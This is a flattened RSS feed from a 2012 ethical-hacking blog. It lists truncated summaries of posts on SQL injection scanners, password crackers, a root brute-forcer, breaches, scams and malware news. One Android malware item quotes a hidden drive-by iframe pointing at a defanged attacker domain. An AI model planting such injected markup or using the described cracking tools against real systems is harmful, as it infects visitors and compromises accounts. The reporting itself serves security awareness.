http://www.hackingtricks.in/A website on Ethical hacking and penetration testing guide. All the latest cyber world update, hacking tool, security papers, latest vulnerabilities and malwares.ennoreply@blogger.com (Deepanker Verma)Sat, 19 May 2012 00:14:48 PDTBlogger http://www.blogger.com685125blogspot/csAFghttp://feedburner.google.comhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/XemFhKPTVlg/sqlsentinel-v01-released.htmlHacking ToolsSQL InjectionSQL injection toolsnoreply@blogger.com (Deepanker Verma)Fri, 18 May 2012 11:49:03 PDTtag:blogger.com,1999:blog-5009365634130283389.post-2481926589166481148 SQLSentinel is an opensource SQL injection testing tool. This is an automatic tool which helps in finding SQL injection in web applications. This tool includes a web spider and a sql error finder. It takes the URL of the website and then crawls the website to find the vulnerable parameter for SQL injection error. After it has done with job, it will generate the pdf report which contains 2012-05-19T00:19:03.156+05:300http://www.hackingtricks.in/2012/05/sqlsentinel-v01-released.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/0JBpr2tvyDM/anonymous-turns-to-india-announced.htmlAnonymous hackersCyber Newsnoreply@blogger.com (Deepanker Verma)Thu, 17 May 2012 08:22:51 PDTtag:blogger.com,1999:blog-5009365634130283389.post-731514352679035221 Anonymous group has been involved in many hacking activities. So far we've seen Operation Tunisia, Operation Zimbabwe, Operation Egypt and Operation Iran by this hacking group. Now, Anonymous has turned its attention to the subcontinent in Operation India. Infamous hacker group has nowannounced Operation India. They has also pulled down website of Indian Congress and Indian Supreme Court. 2012-05-17T20:52:51.563+05:300http://www.hackingtricks.in/2012/05/anonymous-turns-to-india-announced.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/veiVWnk2dR4/google-books-open-redirection.htmlCyber Newsnoreply@blogger.com (Deepanker Verma)Wed, 16 May 2012 03:43:49 PDTtag:blogger.com,1999:blog-5009365634130283389.post-8862218748804090666 Recently i noticed a vulnerability in Google Books which has been merged into Google Play. It has a open redirection vulnerability in http://books.google.com/ I have also reported it to Google security team and got positive reply. But this vulnerability does not fall into Google's reward program and vulnerability still exists on the website. What is Open Rediection Vulnerability? If a 2012-05-16T16:13:49.021+05:300http://www.hackingtricks.in/2012/05/google-books-open-redirection.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/A5Jf9MhQEaM/hash-code-verifier-tool-to-verify-file.htmlHacking Toolspenetration testingnoreply@blogger.com (Deepanker Verma)Wed, 16 May 2012 00:07:02 PDTtag:blogger.com,1999:blog-5009365634130283389.post-2122702749628113574 Recenlty i saw a nice tool called Hash Code Verifier developed by BreakTheSecurity Team. This tool is design to create and analyze hashes of their files. This will help to check the integrity of the file on the server. Now a days, hackers bind trojans with softwares and upload it oon the interent. So most of the download websites also often publish MD5 or SHA hash of the file so that users 2012-05-16T12:37:02.443+05:300http://www.hackingtricks.in/2012/05/hash-code-verifier-tool-to-verify-file.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/UockwSPfe7s/your-account-has-been-blocked-new.htmlnoreply@blogger.com (Deepanker Verma)Mon, 14 May 2012 08:39:59 PDTtag:blogger.com,1999:blog-5009365634130283389.post-5440927727238804775 Hotmail users are advised not to open any kind of account alert email. A new phishing attack is trying to steal login details of hotmail users. Users are getting email entitled “E-mail account alert!” which warned users  that their accounts have been blocked. It also contain a link to verify and unblock account. Clicking on the link takes users to a website which asks users to enter their login2012-05-14T21:09:59.384+05:300http://www.hackingtricks.in/2012/05/your-account-has-been-blocked-new.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/g8v8wkdNSN4/orion-browser-dumper-v10-released.htmlHacking Toolsforensicsnoreply@blogger.com (Deepanker Verma)Sat, 12 May 2012 10:40:27 PDTtag:blogger.com,1999:blog-5009365634130283389.post-6010984940706477130 Jean-Pierre LESUEUR (DarkCoderSc) releases another Browser Forensic tool for Community called "Orion Browser Dumper v1.0".  This software is an advanced local browser history extractor (dumper), in less than few seconds (like for Browser Forensic Tool) it will extract the whole history content of most famous web browser, Actually Internet Explorer, Mozilla FireFox, Google Chrome, COMODO 2012-05-12T23:10:27.115+05:300http://www.hackingtricks.in/2012/05/orion-browser-dumper-v10-released.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/5qnjdPt7LLA/apple-latest-update-exposes-passwords.htmlmac trojanCyber Newsnoreply@blogger.com (Deepanker Verma)Mon, 07 May 2012 02:35:51 PDTtag:blogger.com,1999:blog-5009365634130283389.post-2209299880355140814 Apple has just released the new Lion security update, Mac OS X 10.7.3, which accidentally exposes passwords in clear text. This update puts a debug log file outside of the encrypted area that stores the user’s password in clear text. This log file contains password of all the users who have logged in since the update was applied.  This flaw was found by a security researcher David Emery, who 2012-05-07T15:05:51.132+05:300http://www.hackingtricks.in/2012/05/apple-latest-update-exposes-passwords.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/l3AqC0A8I3I/what-is-drive-by-download-malware.htmlmalwaresHacking tutorialsdrive by downloadnoreply@blogger.com (Deepanker Verma)Sun, 06 May 2012 08:38:10 PDTtag:blogger.com,1999:blog-5009365634130283389.post-7699159922464361378 There are many posts in my blog when I have posted some malware which use Drive by Download method to infect various system on the internet. But the method Drive by Download seems confusing for many people. This is a requested post which i am writing for those who have sent me mail regarding this post. Drive by Download is a method which some malware use to infect and spread. This is not a 2012-05-06T21:08:10.882+05:300http://www.hackingtricks.in/2012/05/what-is-drive-by-download-malware.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/8jXOplpZ4do/new-drive-by-download-malware-notcom.htmlCyber Newsnoreply@blogger.com (Deepanker Verma)Sun, 06 May 2012 02:05:27 PDTtag:blogger.com,1999:blog-5009365634130283389.post-5892539754272297290 A new Android malware, Notcom (NotCompatible) has been discovered which is infecting Android users by Drive By Download on visiting some malicious websites. These malicious website contain a malicious iframe that looks the USER AGENT string on each visitors request. The iframe code is this: <iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={2012-05-06T14:35:27.986+05:300http://www.hackingtricks.in/2012/05/new-drive-by-download-malware-notcom.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/z61GUs4iZmE/download-browser-forensic-tool-v20.htmlHacking Toolspenetration testingnoreply@blogger.com (Deepanker Verma)Sun, 06 May 2012 01:36:11 PDTtag:blogger.com,1999:blog-5009365634130283389.post-3488025189166669594 Browser Forensic Tool v2.0 is an advanced local browser history search engine. This tool will search extract the URLs for chosen keywords from all the famous web browser, actually Internet Explorer, Google Chrome, Mozilla FireFox, RockMelt, Comodo Dragon and Opera. The program will try to find the URLs in the history title and search for the searched keyword(s). If the keyword is found 2012-05-06T14:06:11.359+05:300http://www.hackingtricks.in/2012/05/download-browser-forensic-tool-v20.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/7VABC0EHy70/hackers-blackmail-dexia-bank-demanded.htmlCyber Newsnoreply@blogger.com (Deepanker Verma)Thu, 03 May 2012 23:42:29 PDTtag:blogger.com,1999:blog-5009365634130283389.post-4511832575368202449 A group of hackers have released a statement in which they clamied to broken into servers pf Elantis, a Belgian credit provider owned by Dexia. They also demaded that the bank pay 150,000 EUR ($196,000) before May 4 of they will leak all the customers data. "In addition to database tables containing data such as internal login credentials, we downloaded numerous tables which contain 2012-05-04T12:12:29.193+05:300http://www.hackingtricks.in/2012/05/hackers-blackmail-dexia-bank-demanded.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/lIgkbv6wYc4/insecure-cryptographic-storage.htmlpenetration testingnoreply@blogger.com (Deepanker Verma)Thu, 03 May 2012 11:53:16 PDTtag:blogger.com,1999:blog-5009365634130283389.post-5422312868978194457 This vulnerability exists on web applications due the lack of knowledge of developers. Most of the organizations uses web application to manage all tasks of the organization. Every company is now putting its confidential document online. But sometimes these applications, designed to access and manage data, fail to protect data. It results in data leakage. Most common problem with the web 2012-05-04T00:23:16.630+05:300http://www.hackingtricks.in/2012/05/insecure-cryptographic-storage.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/9OGwmHVPJiA/unknowns-claims-to-hack-esa-nasa-us-air.htmlCyber Newsnoreply@blogger.com (Deepanker Verma)Wed, 02 May 2012 03:23:33 PDTtag:blogger.com,1999:blog-5009365634130283389.post-8763937475128032746 A group of hackers called "The Unknowns" has posted a document on online clipboard, pastebin and claimed to hack some high profile websites. These websites includes Bahrain Ministry of Defense, French Ministry of Defense, Jordanian Yellow Pages, European Space Agency (ESA), Thai Royal Navy, Renault, Harvard University, US Military’s Joint Pathology Center, NASA’s Glenn Research Center and the US2012-05-02T15:53:33.329+05:300http://www.hackingtricks.in/2012/05/unknowns-claims-to-hack-esa-nasa-us-air.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/Tk-JYAc_9R0/fastest-password-cracker-oclhashcat.htmlHacking Toolspassword crackingnoreply@blogger.com (Deepanker Verma)Tue, 01 May 2012 22:51:07 PDTtag:blogger.com,1999:blog-5009365634130283389.post-7064569639720852268 oclHashcat-plus is Worlds first and only GPGPU based rule engine and Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker. Features Free Multi-GPU (up to 16 gpus) Multi-Hash (up to 24 million hashes) Multi-OS (Linux & Windows native binaries) Multi-Platform (OpenCL & CUDA support) Multi-Algo (see below) Low resource utilization, you can still watch movies or play games while 2012-05-02T11:21:07.007+05:300http://www.hackingtricks.in/2012/05/fastest-password-cracker-oclhashcat.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/HFL-FmKNA8A/websploit-toolkit-version-16-released.htmlLFIRFIpenetration testingBrute Forcing ToolXSSnetwork hackingnoreply@blogger.com (Deepanker Verma)Mon, 30 Apr 2012 00:17:22 PDTtag:blogger.com,1999:blog-5009365634130283389.post-1738917455046513186 WebSploit is an open source project which is used to scan and analysis remote system in order to fnd various type of vulnerabilites. This tool is very poerful and support multiple vulnerabilities. All the scripts of this tool is written on the python and users can also modify the source code to customize the working according to their need. These are main vulnerabilities which can be found2012-04-30T12:47:22.729+05:300http://www.hackingtricks.in/2012/04/websploit-toolkit-version-16-released.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/G_Wjvj5f3xw/tips-to-protect-facebook-account-from.htmlfacebook hackingHacking tutorialsnoreply@blogger.com (Deepanker Verma)Sat, 28 Apr 2012 23:18:05 PDTtag:blogger.com,1999:blog-5009365634130283389.post-3893296282059210260 Facebook, the social networking website or we can say our virtual world. Most of the people live more in this virtual world than their real world. We share our photos, moods and thoughts with our friends. But with the increase in use of Facebook, Hackers are also very active and they always try to hack innocent people's facebook account. Many people do not care about their Facebook account 2012-04-29T11:48:05.464+05:304http://www.hackingtricks.in/2012/03/tips-to-protect-facebook-account-from.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/6vifThQqXBg/wordpress-331-suffers-multiple-csrf.htmlwordpressWebsite hackingvulnerabilitynoreply@blogger.com (Deepanker Verma)Sat, 28 Apr 2012 22:58:52 PDTtag:blogger.com,1999:blog-5009365634130283389.post-5636389332337277320 WordPress version 3.3.1 suffers from multiple cross site request forgery vulnerabilities. These CSRF vulnerabilities allow attackers to add administrators/users, delete administrators/users, change post title, approve and unapprove comment, delete comment, change background image, change Site Address, insert custom header image, change site title, change administrator's email, change 2012-04-29T11:28:52.920+05:300http://www.hackingtricks.in/2012/04/wordpress-331-suffers-multiple-csrf.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/HKfgEjxrfqk/90-ssl-websites-are-vulnerable-to-beast.htmlWebsite hackingCyber Newsnoreply@blogger.com (Deepanker Verma)Sat, 28 Apr 2012 00:27:30 PDTtag:blogger.com,1999:blog-5009365634130283389.post-7271918694300308943 According to the latest cyber report by the Trustworthy Internet Movement (TIM), a nonprofit organization dedicated to solving Internet security, privacy and reliability problems, 90% of the websites running on HTTPS enabled secure protocol are vulnerable to the SSL attack, BEAST. This report is based on the data provided by SSL Pulse project. This project scanned top 1 million websites with 2012-04-28T12:57:30.809+05:300http://www.hackingtricks.in/2012/04/90-ssl-websites-are-vulnerable-to-beast.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/wXGttUOetrw/new-facebook-scam-offerig-free-ray-bans.htmlfacebook scamsCyber Newsnoreply@blogger.com (Deepanker Verma)Sat, 28 Apr 2012 00:10:26 PDTtag:blogger.com,1999:blog-5009365634130283389.post-6912335231386399786 Just after two days of the aonnuncement of Facebook's partership with five security giants, a new scam arrived on the Facebook. This new Facebook scam is offering users free pairs of Ray-Bans or TOMS shoes. This is nothing but another survey scam in which scammer is tricking users to complete an online survey. Each complete survey will earn some bucks for the scammer. These messages can be 2012-04-28T12:40:26.270+05:300http://www.hackingtricks.in/2012/04/new-facebook-scam-offerig-free-ray-bans.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/F5Pfe76QwPI/vmware-confirms-hackers-stole-source.htmlvmwareHacking NewsCyber Newsnoreply@blogger.com (Deepanker Verma)Thu, 26 Apr 2012 22:47:24 PDTtag:blogger.com,1999:blog-5009365634130283389.post-4817377896753911205 Few days back a hacker calling himself "Hardcore Charlie" has posted a portion of source code and claimed it to be the part of VMware ESX source code. After many rumors, now VMware has confirmed that the source code posted by the hacker is the part of code from its ESX Hypervisor product. Company also posted in the blog and said that a single file from the VMware ESX source code had been 2012-04-27T11:17:24.336+05:300http://www.hackingtricks.in/2012/04/vmware-confirms-hackers-stole-source.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/XzwvIV-2dEk/fbi-and-soca-seize-36-websites-for-card.htmlcredit card hackCyber Newsnoreply@blogger.com (Deepanker Verma)Thu, 26 Apr 2012 22:29:05 PDTtag:blogger.com,1999:blog-5009365634130283389.post-2203033644377613918 Federal Bureau of Investigations (FBI) and Serious Organized Crime Agency (SOCA) has worked together and seized 36 domains. All these 36 websites were involved in the credit card frauds. These websites were all found to be trading illegally-obtained payment card details. Organization has also informed the financial institutions and banks whose customers have been affected by these 2012-04-27T10:59:05.547+05:300http://www.hackingtricks.in/2012/04/fbi-and-soca-seize-36-websites-for-card.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/kA0Q38KLwKQ/collection-of-windows-password-recovery.htmlhack windows passwordWindows trickHacking windows xp administrator passwordpassword crackingnoreply@blogger.com (Deepanker Verma)Tue, 01 May 2012 02:37:40 PDTtag:blogger.com,1999:blog-5009365634130283389.post-1373430031798559942 Being human forgetting ones windows password is a common thing, I am sure you have come across or heard that one of your friends or family members has just forgotten his/her password and can't access the content of their computer. Well, we all are bound to experience a blonde moment one time or several times but when it comes to forgetting your windows login password it can be quite 2012-05-01T15:07:40.111+05:300http://www.hackingtricks.in/2012/04/collection-of-windows-password-recovery.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/VqpYjQ23hrU/response-analysis-and-further-testing.htmlHacking ToolsWeb Application Security Scanner Frameworkpenetration testingnoreply@blogger.com (Deepanker Verma)Mon, 23 Apr 2012 09:48:51 PDTtag:blogger.com,1999:blog-5009365634130283389.post-5807575309645886655 This post is about one more vulnerabilities identification tool. Although this tool is not so famous but works good. RAFT is a suit of security tools which are used as a testing tool for the vulnerability identification in web applications. RAFT utilize common shared elements to make testing and analysis easier. The tool provides visibility in to areas that other tools do not such as various 2012-04-23T22:18:51.677+05:300http://www.hackingtricks.in/2012/04/response-analysis-and-further-testing.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/ZSh_jDEZTvo/rootdabitch-version-01-released.htmlHacking ToolslinuxBrute Forcing Toolnoreply@blogger.com (Deepanker Verma)Fri, 20 Apr 2012 10:53:10 PDTtag:blogger.com,1999:blog-5009365634130283389.post-6485878107498435823 Rootdabitch v0.1 is released. It is a multithreaded Linux/UNIX tool to crack local root through brute-force. For Brute-forcing, it uses Sucrack which is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su.  This tool is fast and works in background so you can easily do some other works. It is a local brute forcer which uses 10 passwords in 3 seconds. When root2012-04-20T23:23:10.449+05:300http://www.hackingtricks.in/2012/04/rootdabitch-version-01-released.htmlhttp://feedproxy.google.com/~r/blogspot/csAFg/~3/V2bFjddjn5Y/switch-to-green-facebook-profile-new.htmlfacebook scamsCyber Newsnoreply@blogger.com (Deepanker Verma)Thu, 19 Apr 2012 05:29:02 PDTtag:blogger.com,1999:blog-5009365634130283389.post-3591196179317606894 Facebook, a billion dollars company has been trying to protect its users. Every time Facebook takes some protection step, a new scam arrives. But Users are more responsible than Facebook in the success of scammers. They always fall in the false claims and offers of scammer such as Timeline removal, pink facebook and so on.  This time a new scam arrives on Facebook which offers to turn Facebook 2012-04-19T17:59:02.838+05:300http://www.hackingtricks.in/2012/04/switch-to-green-facebook-profile-new.htmlnonadult